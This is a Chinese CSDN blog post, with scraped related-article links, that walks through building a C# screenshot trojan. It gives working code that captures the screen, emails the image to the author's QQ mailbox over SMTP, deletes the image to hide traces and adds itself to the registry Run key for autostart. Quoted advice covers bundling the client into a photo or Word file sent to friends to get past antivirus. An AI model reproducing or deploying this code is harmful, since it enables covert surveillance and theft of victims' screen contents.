c#截屏木马,发送到邮箱

最新推荐文章于 2023-08-19 15:18:35 发布
最新推荐文章于 2023-08-19 15:18:35 发布
阅读量1k 收藏 11
点赞数
文章标签: c# 截屏木马 邮件发送
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38046697/article/details/86000379
版权

写在前面

技术本无罪,只是人性恶。我学习伤人技,只是为了不被人伤,而不是为了伤人。

本来是在研究外挂的,但是一不小心技能点点歪了,不过影响也不大,木马跟外挂本来就有很多共通之处。废话说完,进入正题:

我的思路如下:

1、截取屏幕,保存图片

2、装入邮件,发送

3、删除图片,毁尸灭迹

4、自启动

先来第一步:获得截屏图片(啊啊啊啊啊啊,好早就想这样不按格式来,可是他们老是说要注意格式!)

需要用到win32 api的函数:

调用命名空间:using System.Runtime.InteropServices;

        [DllImport("user32.dll")]
        static extern IntPtr GetDC(IntPtr ptr);
        [DllImport("gdi32.dll")]
        static extern int GetDeviceCaps(
           IntPtr hdc, // handle to DC
           int nIndex // index of capability
               );
        [DllImport("user32.dll", EntryPoint = "ReleaseDC")]
        static extern IntPtr ReleaseDC(IntPtr hWnd, IntPtr hDc);

        int DESKTOPVERTRES = 117;
        int DESKTOPHORZRES = 118;

这个是用来获取屏幕实际分辨率的

            Size size = new Size();
            /*获取DPI大小*/
            IntPtr hdc = GetDC(IntPtr.Zero);
            size.Width = GetDeviceCaps(hdc, DESKTOPHORZRES);
            size.Height = GetDeviceCaps(hdc, DESKTOPVERTRES);
            ReleaseDC(IntPtr.Zero, hdc);
            imagescreen();//截图

有些人用Screen.PrimaryScreen.Bounds.Width和Screen.PrimaryScreen.Bounds.Height,这两个是屏幕的大小,但是有些电脑(如手提电脑)屏幕大小跟分辨率不一样,接取出来的图不完全而且模糊。

截图函数:

            Bitmap image = new Bitmap(size.Width, size.Height);//初始化图片
            Graphics g = Graphics.FromImage(image);//调用
            g.CopyFromScreen(0, 0, 0, 0, new Size(size.Width, size.Height));//截取
            ImageFormat imgft = ImageFormat.Jpeg;//类型
            image.Save(filePath, imgft);//保存

第二步:装载邮件,发送

需要两个邮箱,嘿嘿

命名空间:

using System.Drawing.Imaging;
using System.IO;
using System.Net;
using System.Net.Mail;

//QQ邮件发送代码测试成功
                using (SmtpClient client = new SmtpClient("smtp.qq.com", 25))
                {
                    //SSl加密连接开启
                    client.EnableSsl = true;
                    //用户名、密码(进入QQ邮箱网页版->设置->账户->POP3/IMAP/SMTP/Exchange/CardDAV/CalDAV服务->登录第三方客户端时`密码框请输入"授权码"进行验证`生成授权码->生成授权码)
                    client.Credentials = new NetworkCredential("123456789", "abcdefghijklmnop");//两个参数,第一个是qq号码,第二个是授权码
 
                    using (MailMessage mail = new MailMessage())
                    {
                        //邮件发送人
                        mail.From = new MailAddress("123456789@qq.com");
                        //邮件接收人
                        mail.To.Add(new MailAddress("987654321@qq.com"));
                        //Html格式
                        mail.IsBodyHtml = true;
                        //设置邮件优先级
                        mail.Priority = MailPriority.High;
                        //邮件主题
                        mail.Subject = "屏幕截图!";
                        //邮件正文
                        mail.Body = @"获取大成功!<br>666";

                        string file = filePath + "textXML.xml";
                        Attachment fujian = new Attachment(filePath, System.Net.Mime.MediaTypeNames.Application.Octet);
                        System.Net.Mime.ContentDisposition disposition = fujian.ContentDisposition;
                        disposition.CreationDate = System.IO.File.GetCreationTime(file);
                        disposition.ModificationDate = System.IO.File.GetLastWriteTime(file);
                        disposition.ReadDate = System.IO.File.GetLastAccessTime(file);
                        mail.Attachments.Add(fujian);
                        //发送邮件
                        client.Send(mail);
                        //Console.WriteLine("发送成功");

别的邮箱要改一下网址

发送完成后毁尸灭迹

File.Delete(str);

在接下来就是自启动

来自:

作者:senblingbling  来源:CSDN  原文:https://blog.csdn.net/senblingbling/article/details/50609237  版权声明:本文为博主原创文章,转载请附上博文链接! 
自启动普遍使用的5、6种方法几乎没有不被360拦截的。 
注册表你想写就被拦截,要么插入explorer,拦截。放在自启动目录,太低级了吧,msconfig一下就看到就关掉了,还会被电脑优化速度优化掉。。。。 
但这里还是要提供一下代码: 
写注册表的方法:

public void SetAutoRun(string fileName, bool isAutoRun)  
{  
    RegistryKey reg = null;  
    try 
    {  
        if (!System.IO.File.Exists(fileName))  
            throw new Exception("该文件不存在!");  
        String name = fileName.Substring(fileName.LastIndexOf(@"\") + 1);  
        reg = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true);  
        if (reg == null)  
            reg = Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run");  
        if (isAutoRun)  
            reg.SetValue(name, fileName);  
        else 
            reg.SetValue(name, false);  
        lbl_autorunerr.Visible = false;  
    }  
    catch 
    {  
        lbl_autorunerr.Visible = true;  
        //throw new Exception(ex.ToString());  
    }  
    finally 
    {  
        if (reg != null)  
            reg.Close();  
    }  
}

使用的时候,直接调用SetAutoRun函数即可,这里解释一下两个参数的含义: 
fileName:需要设置自动启动程序的路径,若为当前程序可直接传递Application.ExecutablePath。 
isAutoRun:是否自动运行,为false时,取消自动运行。 
例: SetAutoRun(Application.ExecutablePath, true); //设置自动启动当前程序 
SetAutoRun(Application.ExecutablePath, false); //取消自动启动 
自启动方法还有很多,大家可以查询,但是普遍不实用啊!比如插explorer,这种桌面进程太敏感,被病毒用得不爱用的,早就被各种防御软件盯得紧紧的!

为了让程序更顽强,我们可以给客户端加上双进程保护,加上U盘自启动,并让程序自动复制到所有的盘符目录下等等。

这里要提一下,我个人觉得最好用的方法吧,就是把该客户端捆绑到某个文件或者程序上,而不要设置自启动了,因为过不去360。比如用捆绑机把客户端捆绑到一张照片上或者word上发给你的好友,然后就在服务器打开服务端静静滴等待!所有杀毒软件都没用!亲测!

链接到这上面都是大神的原话,我懒得修改了。

运行后就可以在接收人邮箱上看到截屏图了。

自启动部分只是稍微尝试了一下,并没有深层尝试(那几种方法已经比较老了,懒得再研究),说到底我本质还是一个四有青年、公德良民,制造真正木马这种事我还是很羞涩的!

以上,完!

惊艳了旧时光
关注
C#截屏发送邮箱
Neok HOME
08-06 910
namespace CaptureScreen{    static class Program    {        ///          /// The main entry point for the application.         ///          //[STAThread]         static void Main(
C#实现屏幕截图木马
senblingbling的专栏
01-29 7386
本文用C#进行简单的屏幕截图木马编程,适合新手学习网络通信,线程如何阻塞,如何屏幕截图,如何隐藏程序,如何让程序开机自启动等等!精彩不要错过~
使用vbs .bat和java编写一个开机截屏发送给自己邮箱的功能
try_zp_catch的博客
07-26 832
首先要保证执行电脑中已经配置好java环境,因为我们执行的是java文件。   然后在java中写出截屏代码,   Dimension screenSize = Toolkit.getDefaultToolkit().getScreenSize(); Rectangle screenRectangle = new Rectangle(screenSize); Robot robot = ...
python 制作邮件黑客程序,程序实现开机自启,发送邮件控制摄像头开启,录像发回邮箱
zhaohj123456的博客
05-07 1227
# -*- coding: UTF-8 -*- import re ...
C#写的截屏别人桌面的源代码
08-14
根据提供的文件信息,可以看出这是一段使用C#编写的代码示例,主要功能是截取当前屏幕的画面并将其保存为像文件(此处为BMP格式),之后通过邮件发送像。这种行为涉及到网络安全和个人隐私的问题,因此在此...
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8090
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下所示。 输入sh lanmp.sh命令运行LANMP,这时程...
C++视频教程资源链接合集
Laic Zhang的博客
05-09 5083
链接:http://pan.baidu.com/s/1c0tXu5E 密码:2y6b 2015-05-30 打造自己的QQ 链接:http://pan.baidu.com/s/1sjNtc9R 密码:wyeo 2015-06-02_系统架构 链接:http://pan.baidu.com/s/1o6CEDVs 密码:xu4f 2015-05-20_找女朋友咯 链接:http://pan.baidu...
综合一
刘群智的博客
07-27 4127
自我介绍 左固定右自适应布局 这是一个很常见的布局,当然也可以实现右侧自适应,左侧自适应。比如常见的网页中,左侧导航栏是固定的,右侧的内容区要自适应浏览器的大小。 现在我们来看下HTML布局: &lt;div id="outer"&gt;   &lt;div id="sidebar" style="height:240px;"&gt;固定宽度区&lt;/div&gt;   &lt;d
网络安全工具箱合集
04-28 3640
收集了Github上数10种类别的开源扫描器,包括子域名,数据库,中间件和其他模块化设计的扫描器等,但对于一些被大众所熟知的知名扫描工具,如nmap、w3af、brakeman、arachni、nikto、metasploit、aircrack-ng将不包括在本项目的收集范围内。 子域名爆破枚举或接管 https://github.com/lijiejie/subDomainsBrute-...
C# 建立Socket连接 持续发送屏幕截图
cc_fys的博客
10-06 1877
c#写的一个demo,建立Socket连接之后,循环发送电脑屏幕截图  服务器端开启之后监听端口号2000,为新建连接创建新的Socket。之后从客户端接收截图,判断一张片接收结束之后。将片显示于pictureBox控件上。 客户端连接到服务器后,获取屏幕截图之后,设置片的大小和清晰度,并循环发送截图
Python实现电脑监视器,防止摸鱼,可实现定时截屏发送到指定邮箱
m0_66334898的博客
03-06 707
适用于公司防止摸鱼(虽然有点不道德),可使用pyinstaller工具打包,生成快捷方式,再放到C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 路径就可以实现开机自启动能获取 时间, ip,用户名,计算机名我采用的是伪装成windmillworker 不会有程序检测到授权码获取方法:这里以QQ邮箱为例,其他邮箱可百度。
c#实现远程截取屏幕:发送端和接收端C/S----B/S
anya的专栏
12-04 1811
 发送端using System;using System.Drawing;using System.Collections;using System.ComponentModel;using System.Windows.Forms;using System.Data;using System.Drawing.Imaging;using System.IO;using System.Net;
windows黑客编程系列(八):以固定频率获取屏幕截图
至臻求学,胸怀云月
04-23 1935
文章目录功能技术模块桌面截屏WIN APIGetDCBitBltICONINFO结构体编码实现运行效果 功能技术模块 病毒木马的入侵并潜伏在用户计算机上总是有着某种目的,例如获取用户隐私的办公文件或是账号密码,或是控制肉鸡,或是进行加密磁盘文件然后进行勒索。 桌面截屏 对用户桌面进行截屏,获取截屏数据,能够让病毒木马的控制者直接观看到用户计算机的画面,直观地了解到目前计算机的操作和状态,便于监控用...
python结合邮件制作木马程序
最新发布
2301_79455688的博客
08-19 1791
以上代码就是木马程序的核心,可以继续添加功能,但万不可做违法的事,下一期是一个炫酷的病毒控制端。
自己动手做QQ木马----邮件发送篇 (转)
csd3176的博客
12-13 756
自己动手做QQ木马----邮件发送篇 (转)[@more@]自己动手做qq木马----邮件发送篇XML:namespace prefix = o ns = "urn:schemas-microsoft-com:Office:of...
Python——Socket编写简单脚本木马远程控制截屏发送截图
Ho1aAs‘s Blog
07-31 3422
文章目录一、工具&环境二、实验原理三、编写脚本Ⅰ、Server服务端Ⅱ、Client客户端四、运行截图完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、工具&环境 Python 3 花生壳 远程计算器 二、实验原理 三、编写脚本 出现报错请更换编码方式,如:gb18030、gbk等 Ⅰ、Server服务端 import socket,sys,threading,struct,os def service(): #抛出错误
使用Python开发木马程序
热门推荐
oxuzhenyi的博客
07-22 1万+
使用Python开发木马程序 一、实验介绍 1.1 实验内容 木马程序会给普通用户带来很多危害,比如盗取QQ账号,游戏账号等。课程将用Python实现一个简易的木马程序,该程序会记录用户的键盘输入和屏幕截图并将数据发送到指定的服务器。通过分析键盘输入的数据,可以分析出root密码和其他账号的密码等等。 1.2 实验知识点 linux设备文件linux下Python多进程编程Pytho
全球首款“偷拍插件”曝光 偷偷上传用户屏幕截图
蓝叶菱的专栏
01-28 2183
http://bbs.360safe.com/thread-497075-1-1.html 1月28日,360安全中心发布公告称,发现百度凤巢正在推广一款名为Baidu.Medusa的“偷拍插件”。它在未作任何提示、未经用户允许的情况下,暗中对用户电脑屏幕截图,并把片上传到百度服务器。此前,只有木马和间谍软件才会偷拍屏幕截图,大众商业软件中百度“偷拍插件”在
通过Cef.CefSharp实现网页截图,并发送邮件
个人记录
12-20 1088
通过Cef.CefSharp实现网页截图,并发送邮件
C# 使用QQ邮箱发送带附件的邮件教程
C#编程中,使用QQ邮箱发送带有附件的邮件涉及到几个关键步骤和注意事项。以下是一份详细的指南: 1. 开启SMTP服务: 在发送邮件之前,您需要确保发送方的QQ邮箱已经启用了SMTP服务。这通常在邮箱的设置中完成。...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值